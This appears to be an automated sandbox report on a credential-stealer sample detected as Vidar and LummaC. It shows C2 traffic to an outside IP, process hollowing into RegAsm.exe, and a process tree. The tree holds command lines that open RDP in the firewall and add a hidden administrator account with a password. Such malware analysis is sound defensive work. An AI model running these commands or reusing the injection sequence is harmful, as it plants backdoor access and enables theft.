2024-09-26 22:15:50 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49794	5.75.211.162	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:52 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:52 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JJJKFBAAAFHJEBFIEGIDCont
2024-09-26 22:15:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:53 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Target ID:	0
Start time:	18:14:03
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x830000
File size:	413'224 bytes
MD5 hash:	F73186DF5A030CF7F186B0737C3AF1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:14:03
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:14:03
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:15:05
Start date:	26/09/2024
Path:	C:\ProgramData\IDBAFHDGDG.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\IDBAFHDGDG.exe"
Imagebase:	0x100000
File size:	385'064 bytes
MD5 hash:	47697A60A96C5ADEF362D8DA9A274B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:15:05
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:15:06
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:15:08
Start date:	26/09/2024
Path:	C:\ProgramData\GIIIIJDHJE.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GIIIIJDHJE.exe"
Imagebase:	0x3c0000
File size:	413'224 bytes
MD5 hash:	F73186DF5A030CF7F186B0737C3AF1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:15:08
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:15:08
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x760000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\ProgramData\AFHDGDGIID.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\AFHDGDGIID.exe"
Imagebase:	0xb90000
File size:	73'216 bytes
MD5 hash:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\AFHDGDGIID.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:15:11
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user
Imagebase:	0xb30000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:15:11
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user
Imagebase:	0x520000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:15:13
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:15:13
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:15:14
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Imagebase:	0x400000
File size:	1'785'344 bytes
MD5 hash:	C213162C86BB943BCDF91B3DF381D2F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000013.00000002.2487557862.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000013.00000000.2436777725.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:15:15
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:15:15
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:15:15
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xb70000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:15:16
Start date:	26/09/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Imagebase:	0x7ff6d0d80000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:15:17
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpvideominiport.sys
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff7c7de0000
File size:	32'600 bytes
MD5 hash:	77FF15B9237D62A5CBC6C80E5B20A492
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	18:15:18
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpdr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	169'984 bytes
MD5 hash:	64991B36F0BD38026F7589572C98E3D6
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	18:15:18
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\tsusbhub.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	137'728 bytes
MD5 hash:	CC6D4A26254EB72C93AC848ECFCFB4AF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	18:15:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user RDPUser_fec8106a DlRcmVQWc0I6 /add
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	18:15:30
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	18:15:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user RDPUser_fec8106a DlRcmVQWc0I6 /add
Imagebase:	0xb30000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:15:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add
Imagebase:	0x520000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup
Imagebase:	0xb30000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup
Imagebase:	0x520000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:15:32
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup "Administrators" RDPUser_fec8106a /add
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	18:15:32
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	18:15:32
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Administrators" RDPUser_fec8106a /add
Imagebase:	0xb30000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	18:15:32
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add
Imagebase:	0x520000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	18:15:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	18:15:33
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	18:15:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
Imagebase:	0xb30000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	18:15:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add
Imagebase:	0x520000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	34.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40%
Total number of Nodes:	15
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02D4212D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D4209F,02D4208F), ref: 02D4229C
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02D422AF
Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 02D422CD
ReadProcessMemory.KERNELBASE(0000009C,?,02D420E3,00000004,00000000), ref: 02D422F1
VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 02D4231C
WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 02D42374
WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 02D423BF
WriteProcessMemory.KERNELBASE(0000009C,-00000008,?,00000004,00000000), ref: 02D423FD
Wow64SetThreadContext.KERNEL32(000000A0,01030000), ref: 02D42439
ResumeThread.KERNELBASE(000000A0), ref: 02D42448

Strings

Load, xrefs: 02D4216B
ress, xrefs: 02D421B7
CreateProcessA, xrefs: 02D421E1
ReadProcessMemory, xrefs: 02D4221A
VirtualAllocEx, xrefs: 02D4222D
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02D4229B
WriteProcessMemory, xrefs: 02D42240
aryA, xrefs: 02D42173
GetThreadContext, xrefs: 02D42207
TerminateProcess, xrefs: 02D4232B
SetThreadContext, xrefs: 02D42253
ResumeThread, xrefs: 02D42269
GetP, xrefs: 02D421AF
VirtualAlloc, xrefs: 02D421F4

Memory Dump Source

Source File: 00000000.00000002.1731336374.0000000002D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d41000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 8d8451c58c9b14b9a758715e3ca2c15fb046eb03320942661d308702772d29f9
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: CBB1E67664024AAFDB60CFA8CC80BDA77A5FF88714F158564EA0CAB341D774FA41CB94

Function 00ED0C40 Relevance: .3, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1730950638.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db099f4af4738ec115f628e51b7a63cde01c556720f86861985000e835bbf067
Instruction ID: 71a86b82f4b3974e39fd6eff79274a0b284b56907d1baf0d49d26fc32348066f
